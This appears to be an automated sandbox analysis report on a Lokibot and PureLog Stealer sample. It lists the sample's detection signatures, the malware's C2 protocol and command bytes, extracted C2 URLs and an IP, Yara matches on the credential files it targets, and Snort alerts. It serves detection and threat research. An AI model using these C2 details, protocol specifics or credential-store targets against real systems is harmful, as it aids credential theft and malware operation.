Edit tour

Windows Analysis Report
SCB#89940578.exe

Overview

General Information

Sample name:	SCB#89940578.exe
Analysis ID:	1431960
MD5:	8bdfe306f813ba1a65ecf6e1da4085c1
SHA1:	7bca83400323c71ee5bd1d655004a4a762e1c71b
SHA256:	857fd5543f14e01ea3b08d3aca6ee6763042a48d7b04c9f035a4a37a4d2e0039
Tags:	exeLoki
Infos:

Detection

Lokibot, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Snort IDS alert for network traffic

Yara detected AntiVM3

Yara detected Lokibot

Yara detected PureLog Stealer

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Machine Learning detection for sample

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Yara detected aPLib compressed binary

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

SCB#89940578.exe (PID: 7112 cmdline: "C:\Users\user\Desktop\SCB#89940578.exe" MD5: 8BDFE306F813BA1A65ECF6E1DA4085C1)

SCB#89940578.exe (PID: 7272 cmdline: "C:\Users\user\Desktop\SCB#89940578.exe" MD5: 8BDFE306F813BA1A65ECF6E1DA4085C1)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://45.77.223.48/~blog/?ajax=posts.php"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1706474563.0000000003B19000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x1e5e8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0xb99b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x1a1df:$des3: 68 03 66 00 00 0x1e5e8:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x1e6b4:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000002.00000002.2812320964.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
00000000.00000002.1709326341.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x17680:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x4a4b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x1328f:$des3: 68 03 66 00 00 0x17680:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x1774c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x24c660:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x239a2b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x24826f:$des3: 68 03 66 00 00 0x24c660:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x24c72c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Process Memory Space: SCB#89940578.exe PID: 7112	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: SCB#89940578.exe PID: 7112	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: SCB#89940578.exe PID: 7112	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: SCB#89940578.exe PID: 7112	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x50911:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x619c5:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0xeb9f5:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: SCB#89940578.exe PID: 7272	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: SCB#89940578.exe PID: 7272	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: SCB#89940578.exe PID: 7272	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: SCB#89940578.exe PID: 7272	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x830b:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 32 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.SCB#89940578.exe.7be0000.10.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.SCB#89940578.exe.3b19970.8.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.SCB#89940578.exe.7be0000.10.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.SCB#89940578.exe.3b19970.8.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.SCB#89940578.exe.4756290.5.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.SCB#89940578.exe.4756290.5.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.SCB#89940578.exe.4756290.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SCB#89940578.exe.4756290.5.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.SCB#89940578.exe.4756290.5.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.SCB#89940578.exe.4756290.5.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.SCB#89940578.exe.4756290.5.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.SCB#89940578.exe.4756290.5.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.SCB#89940578.exe.4756290.5.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.SCB#89940578.exe.4756290.5.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.SCB#89940578.exe.4756290.5.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.SCB#89940578.exe.4756290.5.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.SCB#89940578.exe.4756290.5.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.SCB#89940578.exe.473c270.6.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.SCB#89940578.exe.473c270.6.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.SCB#89940578.exe.473c270.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SCB#89940578.exe.473c270.6.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.SCB#89940578.exe.473c270.6.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.SCB#89940578.exe.473c270.6.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.SCB#89940578.exe.473c270.6.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.SCB#89940578.exe.473c270.6.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
2.2.SCB#89940578.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
2.2.SCB#89940578.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
2.2.SCB#89940578.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.SCB#89940578.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
2.2.SCB#89940578.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
2.2.SCB#89940578.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
2.2.SCB#89940578.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.2.SCB#89940578.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
0.2.SCB#89940578.exe.473c270.6.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.SCB#89940578.exe.473c270.6.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.SCB#89940578.exe.473c270.6.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.SCB#89940578.exe.473c270.6.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.SCB#89940578.exe.473c270.6.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.2.SCB#89940578.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
2.2.SCB#89940578.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
2.2.SCB#89940578.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.SCB#89940578.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
2.2.SCB#89940578.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
2.2.SCB#89940578.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
2.2.SCB#89940578.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.2.SCB#89940578.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.SCB#89940578.exe.46e0650.7.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.SCB#89940578.exe.46e0650.7.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.SCB#89940578.exe.46e0650.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SCB#89940578.exe.46e0650.7.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x73010:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.SCB#89940578.exe.46e0650.7.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x603db:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.SCB#89940578.exe.46e0650.7.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x6f9d4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x6fc1c:$a2: last_compatible_version
0.2.SCB#89940578.exe.46e0650.7.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x6ec1f:$des3: 68 03 66 00 00 0x73010:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x730dc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.SCB#89940578.exe.46e0650.7.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x72156:$f1: FileZilla\recentservers.xml 0x72196:$f2: FileZilla\sitemanager.xml 0x70406:$b2: Mozilla\Firefox\Profiles 0x70170:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x7031a:$s4: logins.json 0x711c4:$s6: wand.dat 0x6fc44:$a1: username_value 0x6fc34:$a2: password_value 0x7027f:$a3: encryptedUsername 0x702ec:$a3: encryptedUsername 0x70292:$a4: encryptedPassword 0x70300:$a4: encryptedPassword
0.2.SCB#89940578.exe.4684a30.4.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.SCB#89940578.exe.4684a30.4.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.SCB#89940578.exe.4684a30.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SCB#89940578.exe.4684a30.4.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0xcec30:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.SCB#89940578.exe.4684a30.4.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0xbbffb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.SCB#89940578.exe.4684a30.4.raw.unpack	Loki_1	Loki Payload	kevoreilly	0xcb5f4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0xcb83c:$a2: last_compatible_version
0.2.SCB#89940578.exe.4684a30.4.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0xca83f:$des3: 68 03 66 00 00 0xcec30:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0xcecfc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.SCB#89940578.exe.4684a30.4.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0xcdd76:$f1: FileZilla\recentservers.xml 0xcddb6:$f2: FileZilla\sitemanager.xml 0xcc026:$b2: Mozilla\Firefox\Profiles 0xcbd90:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0xcbf3a:$s4: logins.json 0xccde4:$s6: wand.dat 0xcb864:$a1: username_value 0xcb854:$a2: password_value 0xcbe9f:$a3: encryptedUsername 0xcbf0c:$a3: encryptedUsername 0xcbeb2:$a4: encryptedPassword 0xcbf20:$a4: encryptedPassword
Click to see the 57 entries

Snort Signatures

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:41.660723
SID:	2024313
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/26/24-04:42:37.043735
SID:	2021641
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

